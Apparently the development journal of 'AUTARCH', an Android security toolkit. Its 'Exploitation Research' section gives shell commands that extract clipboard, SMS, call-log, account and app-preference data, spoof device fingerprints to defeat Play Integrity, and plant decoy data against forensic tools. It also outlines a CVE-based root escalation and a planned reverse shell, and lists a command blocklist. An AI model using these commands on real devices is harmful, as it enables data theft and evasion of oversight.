(15th blueprint) +- `web/templates/base.html` — "Shield" link added in Tools sidebar section (after iPhone Exploit) + +### Files Created + +| File | Lines | Description | +|------|-------|-------------| +| `data/stalkerware_signatures.json` | ~700 | 103 families, 275 packages, 10 govt spyware, 8 perm combos | +| `core/android_protect.py` | ~650 | AndroidProtectManager singleton | +| `modules/android_protect.py` | ~450 | CLI menu (defense category) | +| `web/routes/android_protect.py` | ~300 | Flask blueprint, 33 routes | +| `web/templates/android_protect.html` | ~500 | Web UI, 4 tabs | + +### Files Modified + +| File | Changes | +|------|---------| +| `web/app.py` | Import + register `android_protect_bp` | +| `web/templates/base.html` | Added "Shield" link in Tools sidebar | + +### Verification + +``` +$ py_compile core/android_protect.py ✓ +$ py_compile modules/android_protect.py ✓ +$ py_compile web/routes/android_protect.py ✓ +$ Flask URL map: 33 routes under /android-protect/ +$ autarch.py -l: [android_protect] listed under defense +$ Signature DB: 103 families, 275 packages, 10 govt spyware, 8 combos +``` + +--- + +## Session 11 - 2026-02-15: Tracking Honeypot + +Added the Tracking Honeypot feature to the Android Protection Shield — feeds fake data to ad trackers (Google, Meta, Amazon, data brokers) while letting real apps function normally. + +### Concept + +3-tier protection system: +- **Tier 1 (ADB)**: Reset ad ID, opt out of tracking, ad-blocking DNS, disable WiFi/BT scanning +- **Tier 2 (Shizuku)**: Restrict tracker background data, revoke tracking perms, clear tracker data, force-stop trackers +- **Tier 3 (Root)**: Hosts file blocklist (2000+ domains), iptables redirect, fake GPS location, rotate device identity, fake device fingerprint + +### Files Created + +| File | Lines | Description | +|------|-------|-------------| +| `data/tracker_domains.json` | ~2500 | 2038 unique domains, 139 tracker packages, fake data templates | + +### Files Extended + +| File | Changes | +|------|---------| +| `core/android_protect.py` | +35 honeypot methods (helpers, status, detection, tier 1/2/3, composite, data mgmt) | +| `modules/android_protect.py` | +18 handler methods, menu items 70-87 in new "Tracking Honeypot" section | +| `web/routes/android_protect.py` | +28 routes under `/android-protect/honeypot/` | +| `web/templates/android_protect.html` | +5th "Honeypot" tab with 7 sections, ~20 JS functions | +| `autarch_dev.md` | Phase 4.7 status + feature documentation | + +### Key Implementation Details + +- Tracker DB: 5 categories (advertising, analytics, fingerprinting, social_tracking, data_brokers), 12 companies, 4 DNS providers +- Fake data templates: 35 locations (Eiffel Tower to Area 51), 42 absurd searches, 30 luxury purchases, 44 interests, 25 device models +- Per-device honeypot state persisted in `data/android_protect//honeypot_config.json` +- Hosts blocklist uses same su/mount-remount pattern as android_exploit.py +- Composite activate/deactivate applies all protections for chosen tier and tracks state + +### Verification + +``` +$ py_compile core/android_protect.py OK +$ py_compile modules/android_protect.py OK +$ py_compile web/routes/android_protect.py OK +$ Flask URL map: 28 honeypot routes registered +$ Tracker stats: 2038 domains, 12 companies, 139 packages +$ Hosts generation: 2043 lines +``` + +--- + +## Session 15 - 2026-02-15: WireGuard VPN + Remote ADB (Phase 4.8) + +Integrated WireGuard VPN management from `/home/snake/wg_setec/` into AUTARCH with added remote ADB support (TCP/IP and USB/IP over WireGuard tunnel). + +### New Files + +- **core/wireguard.py** - WireGuardManager singleton (~500 lines) + - Server management: start/stop/restart via wg-quick, status via `wg show` + - Key generation: `wg genkey`/`wg pubkey`/`wg genpsk` + - Client CRUD: create/delete/toggle peers, JSON persistence in `data/wireguard/` + - Config generation: client .conf files, QR codes via qrcode+Pillow + - Remote ADB TCP/IP: connect/disconnect via WG tunnel IPs, auto-connect active peers + - USB/IP: kernel module management, list/attach/detach remote USB devices + - Import existing peers from wg0.conf + - UPnP integration for port 51820/UDP + +- **modules/wireguard_manager.py** - CLI menu (CATEGORY=defense, ~330 lines) + - 18 menu actions: server, clients, ADB TCP/IP, USB/IP, config generation + - Same interactive patterns as android_protect.py + +- **web/routes/wireguard.py** - Flask blueprint, 25 routes (~200 lines) + - `/wireguard/` prefix, all `@login_required` + - Server, clients, ADB, USB/IP, UPnP route groups + +- **web/templates/wireguard.html** - 4-tab web UI (~470 lines) + - Dashboard: status cards, server controls, peer table + - Clients: create form, client table with toggle/delete, detail view with config/QR + - Remote ADB: TCP/IP connect/disconnect, USB/IP module management and device attach + - Settings: import peers, refresh UPnP + +### Modified Files + +- **web/app.py** - Added `wireguard_bp` blueprint (16th blueprint) +- **web/templates/base.html** - Added WireGuard link in System nav section +- **autarch_settings.conf** - Added `[wireguard]` config section + +### Architecture Decisions + +- JSON storage (`data/wireguard/clients.json`) instead of SQLite — matches android_protect pattern +- Reuses AUTARCH auth (`@login_required`) instead of separate bcrypt auth from wg_setec +- `find_tool()` for binary lookup (wg, wg-quick, usbip, adb) +- Config from `autarch_settings.conf [wireguard]` section with sensible defaults +- USB/IP support: `vhci-hcd` kernel module + `usbip` CLI for importing remote USB devices over WG tunnel +- Peer config file modifications use `sudo tee` for permission handling + +### Verification + +``` +$ py_compile core/wireguard.py OK +$ py_compile modules/wireguard_manager.py OK +$ py_compile web/routes/wireguard.py OK +$ Flask URL map: 25 wireguard routes registered +$ WireGuardManager: wg=True, usbip=False, interface=wg0, subnet=10.1.0.0/24 +``` + +--- + +## Session 16 - 2026-02-15: Archon Android Companion App (Phase 4.9) + +Created the Android companion app framework "Archon" (Greek archon = ruler, root of "autarch"). + +### New: `autarch_companion/` — 29 files + +- **com.darkhal.archon** — Kotlin Android app, Material Design 3, dark theme +- **Single Activity + Bottom Navigation** with 4 tabs: + 1. **Dashboard** — ADB TCP/IP toggle, USB/IP export, kill/restart ADB with auto-restart watchdog (5s interval), WireGuard tunnel status + 2. **Links** — 9-card grid linking to AUTARCH web UI sections via system browser + 3. **BBS** — Full-screen WebView loading local terminal HTML, Veilid-wasm placeholder, command system (help/connect/status/about/clear/version) + 4. **Settings** — Server IP, web/ADB/USB-IP ports, auto-restart toggle, BBS address, connection test (ping + TCP) + +### Key Implementation Details + +- **AdbManager.kt** — root shell commands: `setprop service.adb.tcp.port`, `stop adbd`, `start adbd` +- **UsbIpManager.kt** — `usbipd -D` daemon control, `usbip list -l` device listing +- **ShellExecutor.kt** — `Runtime.exec()` with timeout, root via `su -c` +- **PrefsManager.kt** — SharedPreferences wrapper for 6 config keys +- **BBS terminal** — HTML/CSS/JS with green-on-black monospace theme, command history (arrow keys), @JavascriptInterface bridge to native Android +- **Veilid strategy** — veilid-wasm in WebView (no official Kotlin SDK exists), placeholder until BBS VPS is deployed + +### Architecture Decisions + +- No third-party dependencies — only AndroidX + Material Design 3 +- veilid-wasm in WebView chosen over JNI bindings (simpler, less maintenance) +- Root required for ADB/USB-IP control (standard for companion management apps) +- BBS has full local command system that works offline (help, about, version, status) +- Links open in system browser rather than embedded WebView (simpler, respects user browser choice) + +### Build Config + +- Gradle 8.5, AGP 8.2.2, Kotlin 1.9.22 +- minSdk 26 (Android 8.0), targetSdk 34 (Android 14) +- Build requires Android Studio (no Android SDK on Orange Pi) + +### Network Discovery (added same session) + +Added auto-discovery so Archon finds AUTARCH servers without manual IP entry. + +**Server (`core/discovery.py`):** +- mDNS: advertises `_autarch._tcp.local.` via Python `zeroconf` package +- Bluetooth: sets adapter name to "AUTARCH", enables discoverable, requires AUTH+ENCRYPT+SSP +- Auto-starts on Flask boot, 3 API routes for status/start/stop +- Config: `[discovery]` section in autarch_settings.conf + +**App (`service/DiscoveryManager.kt`):** +- Scans via NSD (mDNS) + Wi-Fi Direct + Bluetooth in parallel +- Auto-configures server IP/port when found +- Dashboard: discovery card with SCAN button, auto-scans on launch +- Settings: AUTO-DETECT SERVER button fills in IP/port from scan + +## Session 17 - 2026-02-15: HuggingFace Inference + MCP Server + Service Mode (Phase 4.10) + +Continued from Session 16. Added 4 features: HuggingFace Inference API backend, MCP server, systemd service, and sideload companion app. + +### HuggingFace Inference API +- `core/llm.py` — `HuggingFaceLLM` class using `huggingface_hub.InferenceClient` +- Text generation + chat completion with streaming support +- Config section `[huggingface]` in autarch_settings.conf +- `core/config.py` — `get_huggingface_settings()` method +- Web settings page + `/settings/llm` POST route for all 4 backends +- CLI menu: Switch Backend now shows 4 options (GGUF, SafeTensors, Claude, HuggingFace) +- Status line displays backend label for all 4 types + +### MCP Server (Model Context Protocol) +- `core/mcp_server.py` — FastMCP server with 11 tools: + nmap_scan, geoip_lookup, dns_lookup, whois_lookup, packet_capture, + wireguard_status, upnp_status, system_info, llm_chat, android_devices, config_get +- Two transports: **stdio** (for Claude Desktop/Code) and **SSE** (for web clients) +- CLI: `python autarch.py --mcp [stdio|sse] --mcp-port 8081` +- Menu option [10]: Start/Stop SSE, Show Config Snippet, Run Stdio +- Web: 4 endpoints under `/settings/mcp/` (status, start, stop, config) +- Config snippet generator outputs JSON for Claude Desktop `mcpServers` config + +### Systemd Service +- `scripts/autarch-web.service` — runs `autarch.py --web --no-banner` +- CLI: `python autarch.py --service [install|start|stop|restart|status|enable|disable]` +- Menu [8]: Full service management UI + +### Sideload Companion App +- Menu [9]: Finds Archon APK in known locations, lists ADB devices, installs via `adb install -r` + +### Web UI Overhaul (Settings Page) +- LLM section now shows all 4 backends with individual save+activate forms +- Each backend form has relevant settings fields +- MCP section with status/start/stop/config buttons and JSON output display + +--- + +## Session 18 — 2026-02-15: Codebase Stub/Placeholder Audit + +Full scan of all Python, Kotlin, JS, and HTML source for stubs, placeholders, and incomplete implementations. + +### Genuine Stubs & Placeholders (TODO list) + +#### 1. AUTARCH REST API (core/menu.py) +- **File:** `core/menu.py:2189-2314` +- **What:** `show_autarch_api()` — The API settings menu displays config (enable/disable, port, key) and lists endpoint documentation, but the endpoints themselves (`/api/v1/status`, `/api/v1/modules`, `/api/v1/scan`, `/api/v1/cve`, `/api/v1/agent/task`) are **not implemented** in the web routes. The docs page says "Endpoints (coming soon)" and "Full documentation will be available when the API is implemented in a future version." +- **Action needed:** Implement the REST API routes in `web/routes/` and connect them to core functionality. Alternatively, the MCP server may supersede this — decide whether both are needed. + +#### 2. Veilid BBS — Archon Companion App (autarch_companion) +- **File:** `app/src/main/assets/bbs/veilid-bridge.js` (lines 28, 62, 85) +- **File:** `app/src/main/kotlin/com/darkhal/archon/ui/BbsFragment.kt` (line 72) +- **What:** The entire BBS tab is a placeholder framework. `VeilidBBS` class has stub `connect()`, `sendMessage()`, and `disconnect()` methods. The WebView loads a terminal UI but cannot actually connect to anything. The Kotlin side has a placeholder Veilid bootstrap config JSON. +- **Action needed:** Deploy an Autarch BBS server on a VPS, integrate `veilid-wasm` into the WebView assets, and wire up the connection protocol. This is blocked on the VPS/BBS server being built. + +#### 3. Wi-Fi Direct Port Discovery (autarch_companion) +- **File:** `app/src/main/kotlin/com/darkhal/archon/service/DiscoveryManager.kt` (line 304) +- **What:** Wi-Fi Direct connection handler hardcodes port 8080 with comment "will be refined via mDNS or API call". +- **Action needed:** Minor — implement port discovery via mDNS `_autarch._tcp` service or a lightweight API handshake after Wi-Fi Direct connection is established. + +### False Positives Excluded +- **HTML `placeholder=""` attributes** — Form input hints in web templates (normal HTML) +- **Pentest tree `NodeStatus.TODO`** — Legitimate pentest workflow status, not code stubs +- **`except: pass` blocks** — Normal exception swallowing in error handlers throughout codebase +- **`return []`/`return None`** — Normal error-path return values +- **"fake" references** — Legitimate anti-stalkerware/honeypot features (fake location, fake fingerprint) +- **`{username}` in osint.py** — URL template placeholder for OSINT site lookups +- **node_modules/ and build/ directories** — Third-party code, not ours + +### Codebase Health Summary +The codebase is surprisingly clean. Only **3 genuine stub areas** found across ~50 source files: +1. REST API endpoints (menu config UI exists but no actual routes) +2. Veilid BBS (intentional — waiting on VPS server deployment) +3. Wi-Fi Direct port (minor hardcoded default) + +--- + +## Session 15 - 2026-02-15: Archon Self-Contained Privilege Server & Module System + +### Shizuku Replaced — Full Self-Containment + +Removed all Shizuku dependencies. Archon now embeds its own privileged server process, +modeled after how Shizuku actually works internally (studied from their GitHub source). + +**Thanks to Shizuku (RikkaApps/Shizuku)** — their open-source code was the guide for +understanding the `app_process` bootstrapping pattern. The technique of using +`CLASSPATH= /system/bin/app_process /system/bin ` to run a Java class +at shell (UID 2000) privilege level is brilliant engineering. We studied their +`ServiceStarter.java`, `ShizukuService.java`, and `Starter.kt` to build our own +simplified version. Credit where credit is due. + +### Architecture: Archon Privilege Server + +``` +App → ArchonClient (TCP socket) → ArchonServer (app_process, UID 2000) +``` + +- **ArchonServer.java** — Pure Java server, runs via `app_process` at shell level + - TCP socket on localhost:17321, JSON protocol, token auth + - Command blocklist for safety (rm -rf, mkfs, reboot, etc.) + - Special commands: `__ping__`, `__shutdown__`, `__info__` + - Logs to `/data/local/tmp/archon_server.log` + +- **ArchonClient.kt** — App-side TCP client + bootstrap logic + - Generates token, builds `app_process` command + - Executes via LocalAdbClient (wireless debugging) + - Manages server lifecycle (start/stop/ping) + +- **Privilege chain:** ROOT → ARCHON_SERVER → LOCAL_ADB → SERVER_ADB → NONE + +### Module System + +Created a proper module system with interface + registry: + +- **ArchonModule.kt** — Interface: id, name, actions, execute, status +- **ModuleManager.kt** — Singleton registry +- **ShieldModule.kt** — Anti-stalkerware/spyware (13 actions) + - Package scanning against known stalkerware patterns + - Permission auditing, device admin scanning, cert checking + - Disable/uninstall/revoke actions through privilege chain +- **HoneypotModule.kt** — Anti-tracking (13 actions) + - Tier 1 (ADB): reset ad ID, private DNS, disable scanning + - Tier 2 (app-specific): restrict trackers, revoke perms + - Tier 3 (root): hosts blocklist, iptables redirect, identity randomization + +### UI Changes + +- BBS tab → Modules tab (BBS was a placeholder for Veilid) +- Modules tab shows server status + Shield/Honeypot cards with action buttons +- Setup tab: removed Shizuku section, added Archon Server start/stop controls +- Flow: Wireless Debugging pair → Start Archon Server → Modules ready + +### Files Changed +- New: `ArchonServer.java`, `ArchonClient.kt`, `ArchonModule.kt`, `ModuleManager.kt`, + `ShieldModule.kt`, `HoneypotModule.kt`, `ModulesFragment.kt`, `fragment_modules.xml` +- Modified: `PrivilegeManager.kt`, `SetupFragment.kt`, `fragment_setup.xml`, + `MainActivity.kt`, `build.gradle.kts`, `AndroidManifest.xml`, `bottom_nav.xml`, + `nav_graph.xml`, `strings.xml`, `LocalAdbClient.kt` +- Deleted: `ShizukuManager.kt`, `BbsFragment.kt`, `fragment_bbs.xml` + +### LocalAdbClient.kt Fix + +Fixed pre-existing build errors with libadb-android v3.1.1 API: +- Replaced `sun.security.x509` cert generation (not available on Android) + with pure DER/ASN.1 encoding — builds X.509 v3 certs from raw bytes +- Fixed `openStream()` → `openInputStream()` → `bufferedReader()` chain +- Created anonymous `AbsAdbConnectionManager` subclass with proper overrides + +### Deep Dive: What Shell-Level (UID 2000) Can Actually Do + +At UID 2000, we have access to a massive surface area that normal apps never touch. +This is the same privilege level as plugging in a USB cable and running `adb shell`. + +#### System Commands Available at Shell Level + +| Command | What It Does | Security Relevance | +|---------|-------------|-------------------| +| `pm` | Package manager — install, uninstall, disable, grant/revoke perms | Remove stalkerware, revoke spyware permissions | +| `am` | Activity manager — start activities, broadcast, force-stop | Kill malicious processes, trigger system actions | +| `settings` | Read/write system, secure, global settings | Change device identifiers, DNS, proxy, accessibility | +| `dumpsys` | Dump any system service state | Extract device policy, running processes, battery stats | +| `cmd` | Direct commands to system services | Control appops, jobscheduler, connectivity | +| `content` | Query/modify content providers | Read/write contacts, SMS, call log (for backup/wipe) | +| `service call` | Raw Binder IPC to system services | Clipboard access, service manipulation | +| `input` | Inject touch/key events | UI automation | +| `screencap` / `screenrecord` | Capture display | Evidence collection | +| `svc` | Control wifi, data, power, usb, nfc | USB lockdown, NFC control | +| `appops` | App operations management | Restrict background activity, sensors | +| `dpm` | Device policy manager | Remove device admins | +| `getprop` / `setprop` | System properties | Fingerprint spoofing, build info | +| `logcat` | System logs | Monitor for exploit indicators | +| `run-as` | Switch to debuggable app context | Access debuggable app data | +| `cmd wifi` | WiFi subsystem commands | List networks, saved passwords | + +#### What Shell CANNOT Do (Root Required) + +- Write to /system, /vendor, /product partitions +- `setenforce 0` (set SELinux permissive) — requires root/kernel +- Access other apps' /data/data/ directories directly +- Load/unload kernel modules +- iptables/nftables (requires CAP_NET_ADMIN) +- Mount/unmount filesystems +- Modify /dev nodes +- Write to /proc/sys/ + +--- + +### Exploitation Research: Creative Uses of Shell Access + +#### 1. CVE-2024-0044 / CVE-2024-31317: Run-As Any UID (Android 12-14) + +**This is the big one.** Disclosed by Meta security researchers. + +The `run-as` command trusts package data from `/data/system/packages.list`. At shell +level, we can craft a malicious package entry that makes `run-as` switch to ANY UID, +including UID 0 (root) or UID 1000 (system). This effectively gives **temporary root**. + +How it works: +1. Shell can write to `/data/local/tmp/` +2. Exploit the TOCTOU race in how `run-as` reads package info +3. `run-as` runs as UID 2000 but switches context to target UID +4. Patched in Android 14 QPR2 and Android 15, but many devices still vulnerable + +**Impact:** Full root access on unpatched Android 12-14 devices. +**Archon action:** Add a detection module that checks if the device is vulnerable, +and if so, can use it for legitimate protection purposes (installing protective +system-level hooks that persist until reboot). + +#### 2. Anti-Cellebrite / Anti-Forensic Module + +Cellebrite UFED and similar forensic tools use several attack vectors: +- ADB exploitation (they need ADB enabled or exploit USB) +- Bootloader-level extraction +- Known CVE exploitation chains +- Content provider dumping + +**What shell can do to defend:** + +``` +# USB Lockdown — disable all USB data modes +svc usb setFunctions charging +settings put global adb_enabled 0 + +# Monitor USB events in real-time +# (detect when forensic hardware connects) +cat /proc/bus/usb/devices # USB device enumeration + +# Detect Cellebrite-specific patterns: +# - Cellebrite identifies as specific USB vendor IDs +# - Known ADB command sequences (mass dumpsys, content query storms) +# - Rapid content provider enumeration + +# Emergency data protection on forensic detection: +# - Revoke all app permissions +# - Clear clipboard +# - Force-stop sensitive apps +# - Disable USB debugging +# - Change lock to maximum security + +# Feed disinformation via content providers: +# content insert --uri content://sms --bind address:s:fake --bind body:s:decoy +# (populate with convincing but fake data before surrendering device) +``` + +**Architecture for Archon:** +- Background monitoring thread watching USB events + logcat +- Known forensic tool USB vendor ID database +- Configurable responses: lockdown / alert / wipe sensitive / plant decoys +- "Duress PIN" concept: entering a specific PIN triggers data protection + +#### 3. Anti-Pegasus / Anti-Zero-Click Module + +NSO Group's Pegasus and similar state-level spyware use: +- Zero-click exploits via iMessage, WhatsApp, SMS +- Kernel exploits for persistence +- Memory-only implants (no files on disk) + +**What shell can monitor:** + +``` +# Check for suspicious processes +dumpsys activity processes | grep -i "com.apple\|pegasus\|chrysaor" + +# Monitor /proc for hidden processes +ls -la /proc/*/exe 2>/dev/null | grep -v "Permission denied" + +# Check for unusual network connections +cat /proc/net/tcp6 | awk '{print $2}' # Active TCP6 connections +# Cross-reference with known Pegasus C2 IP ranges + +# Check for memory-only implants +cat /proc/*/maps 2>/dev/null | grep -E "rwxp.*deleted" +# rwx+deleted mappings = code running from deleted files (classic implant pattern) + +# Monitor for exploit indicators +logcat -d | grep -iE "exploit|overflow|heap|spray|jit|oat" + +# Check for unauthorized root +ls -la /system/xbin/su /system/bin/su /sbin/su 2>/dev/null +getprop ro.debuggable +getprop ro.secure + +# Check SELinux for permissive domains +cat /sys/fs/selinux/enforce # 1=enforcing, 0=permissive + +# Scan for known spyware artifacts +pm list packages | grep -iE "com\.network\.|com\.service\.|bridge|carrier" +# Pegasus uses innocuous-looking package names + +# Check for certificate injection (MITM) +ls /data/misc/user/0/cacerts-added/ 2>/dev/null +# Spyware often installs CA certs for traffic interception +``` + +**Archon Shield integration:** +- Periodic background scans (configurable interval) +- Known C2 IP/domain database (updated from AUTARCH server) +- Process anomaly detection (unexpected UIDs, deleted exe links) +- Network connection monitoring against threat intel +- Alert system with severity levels + +#### 4. Device Fingerprint Manipulation / Play Integrity + +For making GrapheneOS appear as stock Android to Play Services: + +``` +# Android ID manipulation +settings put secure android_id $(cat /dev/urandom | tr -dc 'a-f0-9' | head -c 16) + +# Build fingerprint spoofing (some writable via setprop) +setprop ro.build.fingerprint "google/raven/raven:14/UP1A.231005.007/10754064:user/release-keys" +setprop ro.product.model "Pixel 6 Pro" +setprop ro.product.manufacturer "Google" + +# GSF (Google Services Framework) ID — stored in settings +settings put secure android_id + +# Keystore attestation is TEE-bound and cannot be spoofed at shell level +# BUT: Play Integrity has multiple levels: +# - MEETS_BASIC_INTEGRITY: Can be satisfied with prop spoofing +# - MEETS_DEVICE_INTEGRITY: Requires matching CTS profile +# - MEETS_STRONG_INTEGRITY: Requires hardware attestation (impossible to fake) + +# For BASIC integrity on GrapheneOS: +# Spoof enough props to pass CTS profile matching +# This is what Magisk's MagiskHide and Play Integrity Fix do + +# Donor key approach: if we can obtain a valid attestation certificate chain +# from a donor device, we could theoretically replay it. BUT: +# - Keys are burned into TEE/SE at factory +# - Google revokes leaked keys quickly +# - This is legally/ethically complex + +# More practical: use the "pretend to be old device" approach +# Older devices don't need hardware attestation +setprop ro.product.first_api_level 28 # Pretend we shipped with Android 9 +``` + +#### 5. NFC on GrapheneOS + +GrapheneOS restricts some NFC functionality for security: + +``` +# Enable NFC +svc nfc enable + +# Set default HCE (Host Card Emulation) app +settings put secure nfc_payment_default_component com.darkhal.archon/.NfcPaymentService + +# Check NFC adapter state +dumpsys nfc | grep -E "mState|mEnabled|mScreenState" + +# The real issue: GrapheneOS blocks NFC in certain states +# At shell level we can: +# 1. Monitor NFC state changes +# 2. Re-enable NFC when GrapheneOS disables it +# 3. Set up a persistent watchdog that keeps NFC active + +# For HCE apps that need to work on GrapheneOS: +# cmd nfc enable-reader-mode # force reader mode +# settings put secure nfc_payment_foreground 1 # require foreground +``` + +#### 6. Temporary Root That Clears on Reboot + +Multiple approaches possible at shell level: + +**A. CVE exploitation (device-specific):** +- Scan for known unpatched vulns on the running kernel +- Exploit → get root → install temp hooks → hooks die on reboot +- Kernel version available via `uname -r`, match against CVE database + +**B. Debuggable system app abuse:** +- `pm list packages -3` vs `pm list packages -s` — find system apps +- Check which are debuggable: `run-as id` +- Debuggable system apps = system UID access via run-as + +**C. Writable /data partition exploitation:** +- Shell owns /data/local/tmp/ fully +- Some init scripts read from /data/ locations +- On next boot, if we planted scripts, they could run at higher privilege +- BUT: SELinux contexts usually prevent this on modern Android + +**D. `app_process` privilege chain:** +- Our ArchonServer already runs at shell level +- We can chain: ArchonServer → exploit → root process +- Root process creates a Unix socket +- ArchonServer proxies commands to root socket +- Root socket dies on reboot (no persistence) + +#### 7. Key/Credential Extraction + +``` +# WiFi passwords (Android 10+) +cmd wifi list-networks # List saved networks +# Full password extraction requires root on modern Android + +# VPN credentials +dumpsys connectivity | grep -A5 "VPN" + +# Account information +dumpsys account | grep -E "Account|name|type" + +# Clipboard (potentially contains passwords) +service call clipboard 2 i32 1 i32 0 # getPrimaryClip (raw binder call) + +# Accessibility service data (if any are running) +settings get secure enabled_accessibility_services +dumpsys accessibility + +# Content provider queries (contacts, call log, SMS) +content query --uri content://call_log/calls --projection number:date:duration +content query --uri content://sms --projection address:body:date + +# SharedPreferences of debuggable apps +for pkg in $(pm list packages -3 | cut -d: -f2); do + run-as $pkg cat shared_prefs/*.xml 2>/dev/null && echo "=== $pkg ===" +done + +# Bootloader state (informational, can't extract keys) +getprop ro.boot.verifiedbootstate # green/yellow/orange/red +getprop ro.boot.flash.locked # 1=locked, 0=unlocked +getprop ro.oem_unlock_supported # OEM unlock availability +``` + +#### 8. SELinux Status and Manipulation + +``` +# Check current mode +getenforce # Enforcing or Permissive + +# List all SELinux domains +cat /sys/fs/selinux/policy | sesearch -A 2>/dev/null +# (sesearch not usually available, but we can pull the binary) + +# Check for permissive domains (weak spots) +# On some ROMs, certain domains are permissive even when global is enforcing +cat /proc/1/attr/current # init's SELinux context +cat /proc/self/attr/current # our own context (u:r:shell:s0) + +# SELinux audit log (shows what's being denied) +logcat -d -b events | grep avc +# These denials reveal what shell WOULD be able to do if SELinux were permissive + +# On some kernels (esp. older or custom): +# setenforce 0 # Set permissive (requires root on stock, but some kernels allow shell) + +# The most promising approach: find a domain transition +# If we can transition from shell context to a more permissive context, +# we gain capabilities without needing to disable SELinux globally +``` + +--- + +### New TODOs: On-Device AI Agent System + +#### TODO 1: On-Device LLM with Agent/Tools (SmolChat + Koog) + +**Goal:** Run a small LLM directly on the phone with tool-calling capabilities, +so the AI can autonomously execute security scans, manage trackers, and respond +to threats — completely offline, no cloud dependency. + +**Research completed on two LLM engines:** + +**SmolChat-Android** (https://github.com/shubham0204/SmolChat-Android) +- Apache 2.0, Kotlin + llama.cpp JNI +- Runs any GGUF model (huge ecosystem on HuggingFace) +- `smollm` module is an embeddable Android library — 2-class Kotlin API +- Auto-detects CPU SIMD (has ARMv8.4 SVE optimized builds) +- No tool-calling built in — we need to add that layer +- Streaming via Kotlin Flow, context tracking, chat templates from GGUF metadata +- **This is the inference engine to embed.** + +**mllm** (https://github.com/UbiquitousLearning/mllm) +- MIT license, C++20 custom engine +- Supports multimodal (vision + text — Qwen2-VL, DeepSeek-OCR) +- Qualcomm QNN NPU acceleration (if device has Snapdragon) +- Custom `.mllm` format (must convert from HuggingFace, NOT GGUF) +- Much harder to integrate, but has NPU acceleration and vision +- **Consider for future multimodal features (OCR scanning, photo analysis).** + +**Integration plan:** +1. Embed `smollm` module into Archon Companion +2. Bundle a small GGUF model (Qwen3-0.6B-Q4 or SmolLM3-3B-Q4) +3. Use Koog AI framework for the agent/tool layer (see TODO 3) +4. Define tools that map to our existing modules (ShieldModule, HoneypotModule) +5. LLM can autonomously: scan for threats, block trackers, respond to alerts +6. All processing stays on-device — zero network dependency + +#### TODO 2: Copilot SDK for AUTARCH Server Agent (Research Bot) + +**Goal:** Build a coding/research/chat agent for the AUTARCH server (Orange Pi) +that can use all 11 MCP tools, run security scans, and assist with analysis. + +**Research completed on GitHub Copilot SDK** (https://github.com/github/copilot-sdk) +- MIT license (SDK), proprietary (CLI binary ~61MB) +- Python/TypeScript/Go/.NET SDKs +- BYOK mode: can use Ollama (local) — no GitHub subscription needed +- Has linux-arm64 binary — runs on Orange Pi directly +- MCP integration — can connect to our existing `core/mcp_server.py` +- Tool definitions, permission hooks, skills system +- Agent loop with planning and multi-step execution + +**BUT:** The CLI binary is closed-source. We already have our own LLM backends +(local GGUF, transformers, claude, huggingface) and MCP server. The Copilot SDK +adds another orchestration layer on top of what we built. + +**Alternative:** Build our own agent loop in Python using `core/llm.py` + `core/tools.py`. +We already have the infrastructure. Just need a better ReAct/planner loop. + +**Decision:** Research further. The MCP integration is interesting but we may not +need the proprietary CLI binary. Our own agent system may be better. + +#### TODO 3: Koog AI Agent Framework (For Archon Companion) + +**Goal:** Use JetBrains' Koog framework to add a proper AI agent system to +the Archon Companion app — Kotlin-native, with tool-calling, memory, and +structured output. + +**Research completed on Koog** (https://docs.koog.ai/) +- Apache 2.0, by JetBrains, pure Kotlin +- Kotlin Multiplatform — **officially supports Android** +- 9 LLM providers including Ollama (local) and cloud (OpenAI, Anthropic, etc.) +- First-class tool-calling with class-based tools (works on Android) +- Agent memory, persistence, checkpoints, history compression +- Structured output via kotlinx.serialization +- GOAP planner (A* search for action planning — game AI technique!) +- MCP integration (discover/use external tools) +- Multi-agent: agents-as-tools, agent-to-agent protocol +- Current version: 0.6.2 + +**Why Koog is the answer for Archon:** +- Native Kotlin — fits perfectly into our existing codebase +- `implementation("ai.koog:koog-agents:0.6.2")` — single Gradle dependency +- Class-based tools work on Android (no JVM reflection needed) +- Can point to Ollama on AUTARCH server for inference, or use cloud +- GOAP planner is perfect for security workflows: + - Goal: "Protect device from tracking" + - Actions: scan packages → identify trackers → restrict background → revoke perms + - Planner finds optimal sequence automatically +- Memory system persists security scan results across sessions +- Structured output for scan reports, threat assessments + +**Integration plan:** +1. Add Koog dependency to Archon Companion +2. Define security tools: ScanPackagesTool, RestrictTrackerTool, etc. +3. Wrap PrivilegeManager.execute() as the execution backend +4. Create "Security Guardian" agent with GOAP planner +5. Connect to AUTARCH server's Ollama for inference +6. Or embed SmolChat for fully offline operation +7. Agent can autonomously monitor and respond to threats + +**Koog + SmolChat combo:** +- SmolChat provides the on-device inference engine (GGUF/llama.cpp) +- Koog provides the agent framework (tools, planning, memory, structured output) +- Together: fully autonomous, fully offline security AI agent on the phone + +--- + +### SESSION SAVE — 2026-02-15 (end of session) + +**What got done this session:** +- Phase 4.11 COMPLETE: Replaced Shizuku with self-contained ArchonServer + - ArchonServer.java, ArchonClient.kt, module system, ShieldModule, HoneypotModule + - BBS tab → Modules tab, Setup tab updated, all Shizuku refs removed + - LocalAdbClient.kt fixed (DER/ASN.1 cert generation, libadb-android API fixes) + - BUILD SUCCESSFUL +- Research completed: SmolChat, mllm, Koog AI, Copilot SDK, PhoneSploit-Pro, LinuxDroid +- Exploitation research written above (CVE-2024-0044, anti-Cellebrite, anti-Pegasus, etc.) + +**What user wanted next (plan approved, code NOT started):** +1. Create `research.md` — consolidate ALL research findings +2. Reverse shell module (ArchonShell.java + ReverseShellModule.kt + AUTARCH listener) +3. `arish` — interactive shell like Shizuku's `rish` +4. Samsung S20/S21 section: + - JTAG pinpoints and schematics + - Bootloader weakness analysis + - Secureboot partition dumping techniques + - Donor key technique for NFC (user's own key, for GrapheneOS) + - Hardening guides for S20/S21 specifically + - Tool section for those phones +5. LLM suite addon (SmolChat + Koog, future phase) + +**Plan file:** `/home/snake/.claude/plans/stateful-conjuring-moler.md` + +**WHERE CLAUDE STOPPED CODING:** +- Was implementing Phase 4.11 (Shizuku replacement) — that part FINISHED and builds +- Then user asked for reverse shell module + research + Samsung guides +- Claude entered plan mode, wrote the plan, then GOT STUCK +- Kept looping on ExitPlanMode instead of coding +- Never started writing ANY code for Phase 5 +- Never created research.md +- Never wrote ArchonShell.java, ReverseShellModule.kt, core/revshell.py, or any Phase 5 files +- The ONLY output was the plan file and the exploitation research notes above in devjournal +- All Phase 5 code is AT ZERO — nothing exists yet, start from scratch using the plan + +**NOTE:** Claude malfunctioned — got stuck in plan mode loops, 